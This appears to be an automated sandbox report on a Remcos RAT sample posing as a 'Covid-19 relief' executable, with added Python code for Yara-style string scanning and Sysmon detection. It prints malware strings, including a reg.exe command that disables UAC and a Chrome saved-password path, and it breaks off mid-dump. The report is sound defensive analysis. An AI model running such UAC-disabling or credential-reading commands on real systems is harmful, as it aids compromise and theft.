
Analysis Report Covid-19 relief.exe

Overview

General Information

Sample Name: Covid-19 relief.exe
Analysis ID: 319675
MD5: 5dd2c165636eff7f866e18370351101e
SHA1: 1a25c2d60553096a67b3c87c6385d3e831e84647
SHA256: e85de613abef99e65212dcd6f8077b03763fa37fa81e7921907c9e9c3859b632
Tags: COVID-19, exe, RAT, RemcosRAT

Most interesting Screenshot:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w10x64
  • Covid-19 relief.exe (PID: 5676 cmdline: 'C:\Users\user\Desktop\Covid-19 relief.exe' MD5: 5DD2C165636EFF7F866E18370351101E)
    • RegAsm.exe (PID: 5568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • Covid-19 relief.exe (PID: 1320 cmdline: 'C:\Users\user\Desktop\Covid-19 relief.exe' MD5: 5DD2C165636EFF7F866E18370351101E)
      • RegAsm.exe (PID: 5976 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • RegAsm.exe (PID: 4584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp
  Rule: JoeSecurity_Remcos  Description: Yara detected Remcos RAT  Author: Joe Security

Source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp
  Rule: JoeSecurity_Remcos  Description: Yara detected Remcos RAT  Author: Joe Security

Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_Remcos  Description: Yara detected Remcos RAT  Author: Joe Security

Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp
  Rule: Remcos_1  Description: Remcos Payload  Author: kevoreilly
  Strings:
  • 0x16510:$name: Remcos
  • 0x16888:$name: Remcos
  • 0x16de0:$name: Remcos
  • 0x16e33:$name: Remcos
  • 0x15674:$time: %02i:%02i:%02i:%03i
  • 0x156fc:$time: %02i:%02i:%02i:%03i
  • 0x16be4:$time: %02i:%02i:%02i:%03i
  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp
  Rule: REMCOS_RAT_variants  Description: unknown  Author: unknown
  Strings:
  • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
  • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x159e0:$str_b2: Executing file:
  • 0x16798:$str_b3: GetDirectListeningPort
  • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x16534:$str_b5: licence_code.txt
  • 0x1649c:$str_b6: \restart.vbs
  • 0x163c0:$str_b8: \uninstall.vbs
  • 0x1596c:$str_b9: Downloaded file:
  • 0x15998:$str_b10: Downloading file:
  • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x159fc:$str_b12: Failed to upload file:
  • 0x167d8:$str_b13: StartForward
  • 0x167bc:$str_b14: StopForward
  • 0x16330:$str_b15: fso.DeleteFile "
  • 0x16394:$str_b16: On Error Resume Next
  • 0x162fc:$str_b17: fso.DeleteFolder "
  • 0x15a14:$str_b18: Uploaded file:

(15 entries in the full report; only the first are shown here)

Unpacked PEs

Source: 5.2.RegAsm.exe.400000.0.raw.unpack
  Rule: JoeSecurity_Remcos  Description: Yara detected Remcos RAT  Author: Joe Security

Source: 5.2.RegAsm.exe.400000.0.raw.unpack
  Rule: Remcos_1  Description: Remcos Payload  Author: kevoreilly
  Strings:
  • 0x16510:$name: Remcos
  • 0x16888:$name: Remcos
  • 0x16de0:$name: Remcos
  • 0x16e33:$name: Remcos
  • 0x15674:$time: %02i:%02i:%02i:%03i
  • 0x156fc:$time: %02i:%02i:%02i:%03i
  • 0x16be4:$time: %02i:%02i:%02i:%03i
  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

Source: 5.2.RegAsm.exe.400000.0.raw.unpack
  Rule: REMCOS_RAT_variants  Description: unknown  Author: unknown
  Strings:
  • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
  • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x159e0:$str_b2: Executing file:
  • 0x16798:$str_b3: GetDirectListeningPort
  • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x16534:$str_b5: licence_code.txt
  • 0x1649c:$str_b6: \restart.vbs
  • 0x163c0:$str_b8: \uninstall.vbs
  • 0x1596c:$str_b9: Downloaded file:
  • 0x15998:$str_b10: Downloading file:
  • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x159fc:$str_b12: Failed to upload file:
  • 0x167d8:$str_b13: StartForward
  • 0x167bc:$str_b14: StopForward
  • 0x16330:$str_b15: fso.DeleteFile "
  • 0x16394:$str_b16: On Error Resume Next
  • 0x162fc:$str_b17: fso.DeleteFolder "
  • 0x15a14:$str_b18: Uploaded file:

Source: 5.2.RegAsm.exe.400000.0.unpack
  Rule: JoeSecurity_Remcos  Description: Yara detected Remcos RAT  Author: Joe Security

Source: 5.2.RegAsm.exe.400000.0.unpack
  Rule: Remcos_1  Description: Remcos Payload  Author: kevoreilly
  Strings:
  • 0x16510:$name: Remcos
  • 0x16888:$name: Remcos
  • 0x16de0:$name: Remcos
  • 0x16e33:$name: Remcos
  • 0x15674:$time: %02i:%02i:%02i:%03i
  • 0x156fc:$time: %02i:%02i:%02i:%03i
  • 0x16be4:$time: %02i:%02i:%02i:%03i
  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

(19 entries in the full report; only the first are shown here)
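The Memory Dumps and Unpacked PEs listings above give each Yara hit as "offset:$identifier: value". The following is an added example, not part of the Joe Sandbox report and not the JoeSecurity_Remcos, Remcos_1 or REMCOS_RAT_variants rules themselves: a minimal YARA-style string scanner that reproduces that listing for an arbitrary dump or unpacked PE and evaluates a rule condition over the hits. The string values are copied from the listing; the condition ("$name plus at least three of the $str_b* behaviour strings") is an assumption for illustration, since the real rules' conditions are not on the page. The buffer it scans is constructed inline so the script runs offline.

```python
"""YARA-style string scan over a memory dump, reporting offsets as in the
Joe Sandbox Strings column. Added example; the condition is assumed."""
import re
from collections import defaultdict
from typing import Dict, List

# Identifier -> value, copied from the report's Strings column (subset).
REMCOS_STRINGS: Dict[str, bytes] = {
    "$name": b"Remcos",
    "$time": b"%02i:%02i:%02i:%03i",
    "$str_a1": b"C:\\Windows\\System32\\cmd.exe",
    "$str_a3": (b"/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows"
                b"\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWOR"),
    "$str_a5": b"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    "$str_b1": b'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)',
    "$str_b3": b"GetDirectListeningPort",
    "$str_b5": b"licence_code.txt",
    "$str_b6": b"\\restart.vbs",
    "$str_b8": b"\\uninstall.vbs",
    "$str_b11": b"KeepAlive Enabled! Timeout: %i seconds",
    "$str_b13": b"StartForward",
    "$str_b14": b"StopForward",
}


def scan(buf: bytes, strings: Dict[str, bytes] = REMCOS_STRINGS) -> Dict[str, List[int]]:
    """Return every offset at which each identifier's value occurs in buf.
    Only identifiers with at least one hit appear in the result."""
    hits: Dict[str, List[int]] = defaultdict(list)
    for ident, value in strings.items():
        # re.escape makes backslashes, dots and parentheses literal; the
        # lookahead lets overlapping occurrences be reported as well.
        for m in re.finditer(b"(?=" + re.escape(value) + b")", buf):
            hits[ident].append(m.start())
    return dict(hits)


def condition(hits: Dict[str, List[int]]) -> bool:
    """Assumed rule condition: $name present and >= 3 distinct $str_b* strings."""
    b_count = sum(1 for ident in hits if ident.startswith("$str_b"))
    return "$name" in hits and b_count >= 3


def report(buf: bytes) -> List[str]:
    """Render hits in the report's own 'offset:$id: value' layout."""
    lines = []
    hits = scan(buf)
    for ident, value in REMCOS_STRINGS.items():
        for off in hits.get(ident, []):
            lines.append(f"0x{off:x}:{ident}: {value.decode('latin-1')}")
    return lines


def build_sample() -> bytes:
    """Constructed stand-in for a dumped region: zero padding with a few of the
    strings placed at known offsets (not a real Remcos dump)."""
    buf = bytearray(0x200)

    def put(off: int, value: bytes) -> None:
        buf[off:off + len(value)] = value

    put(0x10, b"Remcos")
    put(0x40, b"%02i:%02i:%02i:%03i")
    put(0x80, b"GetDirectListeningPort")
    put(0xa0, b"licence_code.txt")
    put(0xc0, b"\\uninstall.vbs")
    put(0x100, b"KeepAlive Enabled! Timeout: %i seconds")
    put(0x180, b"Remcos")
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for line in report(sample):
        print(line)
    print("condition matched:", condition(scan(sample)))
```

To use it on a real artifact, read the .sdmp or .unpack file as bytes and pass it to report(); offsets are relative to the start of the buffer, so for a memory dump add the region base (0x400000 for the 5.2.RegAsm.exe.400000.0 dump) to get virtual addresses.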

Sigma Overview

System Summary:

Sigma detected: Remcos
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5568, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat
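The Startup tree (the sample launching RegAsm.exe with no arguments, then the signatures "Creates a process in suspended mode", "Writes to foreign memory regions"), the Sigma hit above (Sysmon EventID 11, RegAsm.exe PID 5568 creating ...\remcos\logs.dat) and the $str_a3 reg.exe ADD ... EnableLUA string from the Yara listing are three host-level observables a detection engineer can act on. The following is an added example, not part of the Joe Sandbox report and not the Sigma rule it cites: detection logic over Sysmon-style events (field names follow Sysmon's Event 1 "Process Create" and Event 11 "File Create" schema). The events are constructed from the page: PIDs, images and the logs.dat path come from the Startup tree and the Sigma data; the benign MSBuild event is invented for contrast; the EnableLUA command line is reconstructed from $str_a3, whose page copy is cut after REG_DWOR, so the "/d 0 /f" tail and its parent process are assumptions. The RegAsm parent allowlist is also an assumption to tune per estate.

```python
"""Sysmon-style detections for the three Remcos behaviours on this page:
RegAsm.exe hollowing, the remcos\\logs.dat keylog file, and the EnableLUA
reg.exe tamper. Added example; sample events are constructed."""
from typing import Dict, List, Tuple

# Parents that legitimately launch RegAsm.exe (assumed allowlist, lowercase).
LEGIT_REGASM_PARENTS = ("\\msbuild.exe", "\\devenv.exe", "\\msiexec.exe", "\\services.exe")


def _lower(value) -> str:
    return (value or "").lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Return a list of findings (empty if the event is unremarkable)."""
    findings: List[str] = []
    eid = int(event.get("EventID", 0))
    image = _lower(event.get("Image"))
    cmd = _lower(event.get("CommandLine"))
    parent = _lower(event.get("ParentImage"))
    pid = event.get("ProcessId")

    if eid == 1 and image.endswith("\\regasm.exe"):
        # A genuine RegAsm run carries an assembly path; a bare image launched
        # by something outside the build/installer allowlist is the pattern in
        # the Startup tree (suspended child, payload written into it).
        bare = cmd.strip().strip('"') == image
        if bare and not parent.endswith(LEGIT_REGASM_PARENTS):
            findings.append(
                f"RegAsm.exe started without arguments by {event.get('ParentImage')} "
                f"(pid {pid}): process-hollowing candidate")

    if (eid == 1 and "reg.exe" in cmd and " add " in cmd
            and "policies\\system" in cmd and "enablelua" in cmd):
        # Any write to EnableLUA via reg.exe is worth an alert; the Remcos
        # payload string shows exactly this command under cmd.exe /k.
        findings.append(f"EnableLUA modified via reg.exe ADD (pid {pid}): UAC tamper")

    if eid == 11 and _lower(event.get("TargetFilename")).endswith("\\remcos\\logs.dat"):
        findings.append(
            f"Remcos keylog written: {event.get('TargetFilename')} by {event.get('Image')} (pid {pid})")
    return findings


# Constructed events (see lead-in for what is taken from the page and what is assumed).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "ProcessId": "5568",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Users\user\Desktop\Covid-19 relief.exe"},
    {"EventID": "1", "ProcessId": "7001",  # benign, constructed
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /codebase MyLib.dll',
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\MSBuild\MSBuild.exe"},
    {"EventID": "11", "ProcessId": "5568",  # the Sigma hit
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\remcos\logs.dat"},
    {"EventID": "1", "ProcessId": "7002",  # reconstructed from $str_a3; tail assumed
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k C:\Windows\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v EnableLUA /t REG_DWORD /d 0 /f",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
]


def run(events: List[Dict[str, str]] = SAMPLE_EVENTS) -> List[Tuple[int, str]]:
    """Return (event index, finding) pairs for every alerting event."""
    return [(i, f) for i, ev in enumerate(events) for f in detect(ev)]


if __name__ == "__main__":
    for idx, finding in run():
        print(f"event[{idx}]: {finding}")
```

The bare-command-line test is the discriminator for the hollowing case: RegAsm.exe has no useful behaviour without an assembly argument, so a no-argument launch from a user-profile binary is low-noise. Feeding real Sysmon XML into detect() only requires mapping the EventData fields to the same keys.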

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Covid-19; ReversingLabs: Detection: 39%
Multi AV Scanner detection for submitted file
Source: Covid-19 relief.exe; ReversingLabs: Detection: 39%
Yara detected Remcos RAT
Source: Yara match; File source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
Source: Yara match; File source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
Source: Yara match; File source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Covid-19; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Covid-19 relief.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.Covid-19 relief.exe.6430000.3.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 2.2.RegAsm.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 3.2.Covid-19 relief.exe.6440000.3.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 5.2.RegAsm.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@AB
V01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$
